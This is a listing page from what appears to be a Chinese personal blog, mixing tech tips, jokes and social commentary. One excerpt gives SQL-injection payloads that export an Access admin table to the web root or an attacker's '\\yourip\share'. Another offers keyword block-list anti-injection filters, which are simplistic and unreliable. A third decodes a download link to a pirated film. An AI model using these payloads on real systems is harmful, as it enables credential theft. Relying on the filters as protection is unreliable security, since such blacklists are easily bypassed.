javascript:void(0);document.write("<a href='http://www.taohuren.com' target='_blank'>点此打开页面</a>");

Copyright © 2008

继续阅读《搜索引擎关键词模拟点击及其实现方法》的全文内容...

分类: 电脑专业 | Tags: 紫砂壶  搜索引擎  关键词  模拟点击   | 添加评论(1)

相关文章:

• 关键词/关键字排名在线查询工具 (2009-7-4 12:10:29)

emulator: ERROR: unknown virtual device name: ‘test’
emulator: could not find virtual device named ‘test’

Copyright © 2008

继续阅读《emulator: ERROR: unknown virtual device name》的全文内容...

分类: 电脑专业 | Tags: | 添加评论(0)

还没有相关文章，您来说两句？

SELECT * into [test.txt] in 'd:\web\' 'text;' from admin

HKEY_LOCALMACHINE\Software\Microsoft\Jet\4.0\Engines\Text\DisableExtension

!txt,csv,tab,asc,tmp,htm,html

SELECT * into [test.txt] in '\\yourip\share' 'text;' from admin
SELECT * into [test.txt] in 'D:\Inetpub\wwwroot\test\cnhcdz' 'text;' from web_admin

Copyright © 2008

继续阅读《利用SQL注入Access导出数据库内容到文本文件》的全文内容...

分类: 电脑专业 | Tags: | 添加评论(0)

还没有相关文章，您来说两句？

<%
'Dim XeSeeinje_Post,XeSeeinje_Get,XeSeeinje_In,XeSeeinje_Inf,XeSeeinje_Xh,XeSeeinje_db,XeSeeinje_dbstr

'您可以在XeSeeinje_In中新增要过滤的参数，用#号隔开
XeSeeinje_In = "'#;#and#exec#insert#select#delete#update#count#chr#mid#master#truncate#char#declare"
XeSeeinje_Inf = split(XeSeeinje_In,"#")

'判断post参数
If Request.Form<>"" Then StopInjection(Request.Form)
'判断get参数
If Request.QueryString<>"" Then StopInjection(Request.QueryString)
'判断cookies参数
If Request.Cookies<>"" Then StopInjection(Request.Cookies)


Function StopInjection(values)
For Each XeSeeinje_Get In values
For XeSeeinje_Xh=0 To Ubound(XeSeeinje_Inf)
If Instr(LCase(values(XeSeeinje_Get)),XeSeeinje_Inf(XeSeeinje_Xh))<>0 Then
Response.Write "<Script Language=JavaScript>alert('防注入系统提示你：\n\n请不要在参数中包含非法字符。');</Script>"
Response.Write "非法操作！系统已经给你做了如下记录：<br>"
Response.Write "操作IP："&Request.ServerVariables("REMOTE_ADDR")&"<br>"
Response.Write "操作时间："&Now&"<br>"
Response.Write "操作页面："&Request.ServerVariables("URL")&"<br>"
Response.Write "提交数据："&values(XeSeeinje_Get)
Response.End
End If
Next
Next
End Function

%>


          ///  <summary>  
    /// 在 Application_BeginRequest中加入函数StartProcessRequest()
    ///  </summary>  
    protected void Application_BeginRequest(Object sender, EventArgs e)
    {
                     StartProcessRequest();
    }

#region SQL注入式攻击代码分析  
    ///  <summary>  
    /// 处理用户提交的请求  
    ///  </summary>  
    private void StartProcessRequest()  
    {  
      try  
      {  
        string getkeys = "";  
        string sqlErrorPage = "/default.aspx";//如果有非法参数,转向的错误提示页面  
        if (System.Web.HttpContext.Current.Request.QueryString != null)  
        {  

          for (int i = 0; i  < System.Web.HttpContext.Current.Request.QueryString.Count; i++)  
          {  
            getkeys = System.Web.HttpContext.Current.Request.QueryString.Keys[i];  
            if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.QueryString[getkeys]))  
            {  
              System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);  
              System.Web.HttpContext.Current.Response.End();  
            }  
          }  
        }  
        if (System.Web.HttpContext.Current.Request.Form != null)  
        {  
          for (int i = 0; i  < System.Web.HttpContext.Current.Request.Form.Count; i++)  
          {  
            getkeys = System.Web.HttpContext.Current.Request.Form.Keys[i];  
            if (getkeys == "__VIEWSTATE") continue;  
            if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.Form[getkeys]))  
            {  
              System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);  
              System.Web.HttpContext.Current.Response.End();  
            }  
          }  
        } 
                                if (System.Web.HttpContext.Current.Request.Cookies != null)  
        {  
          for (int i = 0; i  < System.Web.HttpContext.Current.Request.Cookies.Count; i++)  
          {  
            getkeys = System.Web.HttpContext.Current.Request.Cookies.Keys[i]; 
            if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.Cookies[getkeys].ToString()))  
            {  
              System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);  
              System.Web.HttpContext.Current.Response.End();  
            }  
          }  
        }  
      }  
      catch  
      {  
        // 错误处理: 处理用户提交信息!  
      }  
    }  
    ///  <summary>  
    /// 分析用户请求是否正常  
    ///  </summary>  
    ///  <param name="Str">传入用户提交数据  </param>  
    ///  <returns>返回是否含有SQL注入式攻击代码  </returns>  
    private bool ProcessSqlStr(string Str)  
    {  
      bool ReturnValue = true;  
      try  
      {  
        if (Str.Trim() != "")  
        {  
          string SqlStr = "and |exec |insert |select |delete |update |count |* |chr |mid |master |truncate |char |declare";  

          string[] anySqlStr = SqlStr.Split('|');  
          foreach (string ss in anySqlStr)  
          {  
            if (Str.ToLower().IndexOf(ss) >= 0)  
            {  
              ReturnValue = false;  
              break;  
            }  
          }  
        }  
      }  
      catch  
      {  
        ReturnValue = false;  
      }  
      return ReturnValue;  
    }  
    #endregion 


<?php

function dowith_sql($str)
{
    $refuse_str="and|or|select|update|from|where|order|by|*|delete|'|insert|into|values|create|table|database";
    $arr=explode("|",$refuse_str);
    for($i=0;$i<count($arr);$i++)
    {
        //$replace="[".$arr[$i]."]";
        //$str=str_replace($arr[$i],$replace,$str);
  if(strpos($str,$arr[$i])!=false)
  {
    echo "<Script Language=JavaScript>alert('防注入系统提示你：请不要在参数中包含非法字符。');</Script>";
    echo "非法操作！系统已经给你做了如下记录：<br>";
    echo "操作IP：".$_SERVER["REMOTE_ADDR"]."<br>";
    echo "操作时间：".$_SERVER["REQUEST_TIME"]."<br>";
    echo "操作页面：".$_SERVER["SCRIPT_NAME"]."<br>";
    echo "提交数据：".$str;
    exit();
  }
    }
    return $str;
}
foreach ($_GET as $key=>$value)
{
    $_GET[$key]=dowith_sql($value);
    
}
foreach ($_POST as $key=>$value)
{
    $_POST[$key]=dowith_sql($value);
    
}
?>


Copyright © 2008

继续阅读《防注入代码（ASP/ASP.NET/PHP三种代码）》的全文内容...

分类: 电脑专业 | Tags: 防注入代码  asp  asp.net  PHP  安全   | 添加评论(0)

相关文章:

• ASP无刷新AJAX分页源代码 (2011-3-11 17:41:47)
• ASP技巧之FSO组件（代码大全） (2010-11-10 17:59:26)
• 生成静态组件 (2008-3-12 17:14:15)
• 用asp生成xml的文件头 (2008-3-11 17:7:20)
• PHP生成随机数 (2008-3-4 16:57:41)

<%
@enablesessionstate=false
@LANGUAGE="VBSCRIPT" CODEPAGE="65001"
%>
<!--#include file="conn.asp"-->
<%
response.buffer=true
response.expires=-1
response.contenttype="text/xml"
response.write"<?xml version='1.0' encoding='gb2312'?><aa>"

set conn=new use_mdb

conn.fenye "select count(*) as a from aa",5,"select aa,bb from aa"

conn.end_conn

response.write"</aa>"
%>


Copyright © 2008

继续阅读《ASP无刷新AJAX分页源代码》的全文内容...

分类: 电脑专业 | Tags: asp  无刷新技术  AJAX分页源代码   | 添加评论(0)

相关文章:

• 防注入代码（ASP/ASP.NET/PHP三种代码） (2011-4-8 22:31:0)
• ASP技巧之FSO组件（代码大全） (2010-11-10 17:59:26)
• 生成静态组件 (2008-3-12 17:14:15)
• 用asp生成xml的文件头 (2008-3-11 17:7:20)

Copyright © 2008

继续阅读《修改XP/2000/2003的IIS默认连接数》的全文内容...

分类: 电脑专业 | Tags: | 添加评论(0)

还没有相关文章，您来说两句？

emotionormal=emotion+normal=情绪稳定

sexretary=sex+secretary=女秘书

togayther=together+gay=终成眷属

jokarlist=joke+journalist=记者

Innernet=inner + internet=互联网

circusee=circus+see=围观

vegeteal=vegetable+steal=偷菜

chinsumer=Chinese+consumer=在国外疯狂购物的中国人

suihide=suicide+hide=躲猫猫

don’train=don’t+train=动车

shitizen=shit+citizen=屁民

divoice=divorce+voice=离婚宣言

animale=animal+male=男人天性

Democrazy=democracy + crazy=痴心妄想

Freedamn=freedom + damn=自由

Amerryca=america + merry=享乐国

canclensor=censor + cancel=审查

yakshit=亚克西

carass=轻拂菊花

harmany=harmony + any=河蟹

Copyright © 2008

继续阅读《中国式英语，让你 smilence and emotionormal》的全文内容...

分类: 七七八八 | Tags: | 添加评论(0)

还没有相关文章，您来说两句？

他们的发现---

2010，想买房的人发现，“国十条”猛烈的来了，却没有带走一片云彩。房产调控年年高高举起，年年轻轻放下，年年政策给力，年年执行不力。哎。不是狼来了，而是狼都来腻了。
2010，剩男剩女们发现，其实找对象不用去江苏卫视的《非诚勿扰》，更不用去山东卫视的《爱情来敲门》，只要去上海世博会排几小时队就行，患难之中见真情。
2010，创业者们发现，原来蒙牛董事长牛根生的“小胜靠智，大胜靠德”不靠谱，小胜是要靠智，但大胜得缺德。
2010，唐骏发现，英雄也要问出处，一个人，不论多么辉煌过，一个不小心，就有被集体的口水迅速淹没的那天。
2010，一些精英们发现，他们迷信的李一，其实不是神仙，只是很清楚他们的病根--他们已经成为权力、资本、色欲的奴隶，无法在欣赏到自然的美。
2010，媒体发现，电影《山楂树》玩了把纯情，于是揶揄道：世道这么乱，装纯给谁看？其实在乱世，人们更需要纯情的东西。不管环境多么残酷，留给自己一个纯情的时间，一个纯情的对象，日子就过来了。

2010大家的发现：
A：我发现，以前该省钱的时候我一分钱没省下来；现在真的省下来了，钱又不值钱了。
B: 我发现我找个合适的工作很难，但是，找个合适的对象比找个合适的工作还要难！
C：我发现我女朋友开始催我抓紧时间买房子了，吃饺子也不给我拌蒜泥了。
D：我发现100元越来越像10元了。
E：发现“国考”越来越热了，考上的概率越来越小了，发现考研的越来越多了但含金量越来越低了，发现学校毕业就业率越来越高了，但薪水“低破”一千了。还发现。我长白头发了......
F：发现懂了这句话：他不爱你，不是你不够好，而是你无论怎样，都不好。
G：发现身边的楼房阳台都变成菜园了。

2010的悲喜：
1.长得帅有什么用？考清华有什么用？学经济有什么用？将来还不是要娶罗玉凤！
2.新闻联播的牛叉之处在于就算你一直在换台，也能完整的看完一条新闻。
3.现在的人穿衣服不是为了保暖，而是为了关键时刻有衣服可脱；现在的人同居不是为了结婚，而是为了不用结婚。
4.人类社会发展有很多问题，但归根到底只有三个：长相问题、纯洁问题和人品问题。任何不解的事情，包括《十万个为什么》里面找不到答案的，都可以在这三大问题中找到答案。

结语：做自己的事，活自己的命。因为，神马都是浮云 , 快乐才最重要！

Copyright © 2008

继续阅读《2010的超牛总结》的全文内容...

分类: 七七八八 | Tags: 2010  总结   | 添加评论(0)

还没有相关文章，您来说两句？

来源：该资源为版权方声明保护内容，狗狗已屏蔽其下载。

var g_downUrlList=["%68%74%74%70%3a%2f%2f%62%61%6b%2e%68%6f%74%39%2e%31%31%35%63%64%6e%2e%63%6f%6d%2f%70%69%63%6b%64%6f%77%6e%2f%31%65%64%32%33%63%65%39%38%65%66%31%30%61%33%38%65%36%63%33%39%33%32%64%65%63%66%36%64%64%62%63%34%64%30%32%34%37%36%64%2f%4d%30%30%2f%30%31%2f%37%37%2f%64%35%4e%71%33%45%30%42%35%53%45%41%41%41%41%41%4b%39%4f%4d%61%6b%38%34%70%66%6b%30%38%34%30%31%32%35%2f%25%35%42%25%45%37%25%39%34%25%42%35%25%45%35%25%42%44%25%42%31%25%45%34%25%42%38%25%38%42%25%45%38%25%42%44%25%42%44%25%45%35%25%42%30%25%42%31%25%45%34%25%42%38%25%38%41%57%57%57%2e%56%45%52%59%50%53%50%2e%43%4f%4d%25%35%44%64%78%6a%68%2e%61%76%69%3f%66%69%6c%65%3d%25%35%42%25%45%37%25%39%34%25%42%35%25%45%35%25%42%44%25%42%31%25%45%34%25%42%38%25%38%42%25%45%38%25%42%44%25%42%44%25%45%35%25%42"];
var g_downUrl = decodeURIComponent(g_downUrlList[0]);

<script>
//上面的代码开始

//上面的代码结束
document.write(g_downUrl);
</script>

http://bak.hot9.115cdn.com/pickdown/1ed23ce98ef10a38e6c3932decf6ddbc4d02476d/M00/01/77/d5Nq3E0B5SEAAAAAK9OMak84pfk0840125/%5B%E7%94%B5%E5%BD%B1%E4%B8%8B%E8%BD%BD%E5%B0%B1%E4%B8%8AWWW.VERYPSP.COM%5Ddxjh.avi?file=%5B%E7%94%B5%E5%BD%B1%E4%B8%8B%E8%BD%BD%E5%B

Copyright © 2008

继续阅读《《大笑江湖》高清DVD迅雷下载》的全文内容...

分类: 电脑专业 | Tags: 大笑江湖   | 添加评论(0)

还没有相关文章，您来说两句？

Copyright © 2008

继续阅读《平和质》的全文内容...

分类: 七七八八 | Tags: 平和质   | 添加评论(0)

还没有相关文章，您来说两句？